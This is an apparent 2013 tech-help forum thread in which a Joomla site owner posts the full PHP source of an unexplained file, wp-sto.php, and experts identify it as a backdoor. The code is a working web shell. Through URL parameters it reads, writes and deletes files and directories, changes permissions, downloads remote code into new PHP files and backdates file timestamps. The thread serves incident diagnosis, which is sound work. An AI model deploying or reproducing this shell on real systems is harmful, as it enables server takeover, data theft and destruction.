Solved

strange file suddenly appeared

Posted on 2013-12-14
10
565 Views
Last Modified: 2013-12-14
Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site that I noticed today has a strange file added at my site root 4 days ago that I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP, I'm not entirely sure what it's all supposed to be doing or what it's origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php but wordpress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>

Open in new window


Any ideas?

Thanks
0
Comment
Question by:billium99
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 3
  • 2
  • +2
10 Comments
 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39718988
I only toke a look, but if I were you I would immediately backup those file in my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions, deletes files and these are thing only should do: if you're not sure about, don't trust it.

I don't know joomla, but I doubt any framwork can create such files: I repeat, copy them in an unoffensive location and delete them from the server, then talk with host provider.
0
 
LVL 1

Author Comment

by:billium99
ID: 39718997
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39718999
Yes, get rid of that file.
0
Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39719007
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the php command to delete files.
0
 
LVL 83

Assisted Solution

by:Dave Baldwin
Dave Baldwin earned 125 total points
ID: 39719053
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39719059
And yes, someone broke into your server.  You should change passwords for all access.
0
 
LVL 31

Assisted Solution

by:Marco Gasi
Marco Gasi earned 125 total points
ID: 39719060
Yes, indeed. I was reading the code: really, I don't understand what exactly does in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file passing it some parameter and do something bad like delete your files, even empty whole directories...

Change all password and provide security to your dedicated server, because it has been violated. I'm sorry.
0
 
LVL 35

Assisted Solution

by:gr8gonzo
gr8gonzo earned 125 total points
ID: 39719067
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
 
LVL 110

Accepted Solution

by:
Ray Paseur earned 125 total points
ID: 39719072
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
LVL 1

Author Closing Comment

by:billium99
ID: 39719182
Thanks
0

Featured Post

Salesforce Made Easy to Use

On-screen guidance at the moment of need enables you & your employees to focus on the core, you can now boost your adoption rates swiftly and simply with one easy tool.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article discusses how to create an extensible mechanism for linked drop downs.
3 proven steps to speed up Magento powered sites. The article focus is on optimizing time to first byte (TTFB), full page caching and configuring server for optimal performance.
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

739 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question